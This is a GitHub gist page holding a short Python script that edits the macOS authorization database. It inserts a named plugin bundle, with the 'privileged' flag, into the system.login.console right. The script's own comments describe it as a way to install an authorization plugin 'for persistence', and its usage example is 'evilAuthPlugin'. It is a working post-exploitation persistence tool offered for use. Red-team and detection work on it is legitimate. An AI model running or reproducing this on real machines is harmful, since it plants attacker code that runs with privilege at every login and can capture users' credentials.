/installplugin.py Secret
Last active
October 14, 2018 15:12
Star
You must be signed in to star a gist
python script to install authorization plugin that requests system.login.console right
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# install authorization plugin for persistence. | |
# orginal script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py | |
# system.login.console right should be used for auth plugins | |
# ex: installplugin.py evilAuthPlugin | |
import sys | |
import objc | |
from ctypes import CDLL, c_void_p, byref, c_char_p | |
from ctypes.util import find_library | |
from PyObjCTools import Conversion | |
Security = CDLL(find_library("Security.framework")) | |
AuthorizationRightSet = Security.AuthorizationRightSet | |
AuthorizationRightGet = Security.AuthorizationRightGet | |
AuthorizationCreate = Security.AuthorizationCreate | |
def authorization_right_get(right): | |
db_buffer = c_void_p() | |
AuthorizationRightGet(right, byref(db_buffer)) | |
if db_buffer: | |
return objc.objc_object(c_void_p=db_buffer).mutableCopy() | |
return None | |
def authorization_right_set(right, value): | |
auth_ref = c_void_p() | |
AuthorizationCreate(None, None, 0, byref(auth_ref)) | |
return AuthorizationRightSet(auth_ref, right, value.__c_void_p__(), None, None, None) | |
if __name__ == '__main__': | |
if len(sys.argv) < 2: | |
print "Please provide the bundle name, without the extension" | |
sys.exit(0) | |
bundle = sys.argv[1] | |
authright = "system.login.console" | |
db = authorization_right_get(authright) | |
i = db["mechanisms"].index("HomeDirMechanism:status") #Get the position of the last HomeDirMechanism | |
mechanismValue = u"{}:login,privileged".format(bundle) | |
# Convert the pyobjc object to a python object, something we can change | |
writeableDB = Conversion.pythonCollectionFromPropertyList(db, conversionHelper=None) | |
writeableDB['mechanisms'].insert(i+1, mechanismValue) | |
db = Conversion.propertyListFromPythonCollection(writeableDB, conversionHelper=None) | |
# Update the authorization database | |
authorization_right_set(authright, db) | |
print "Done" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment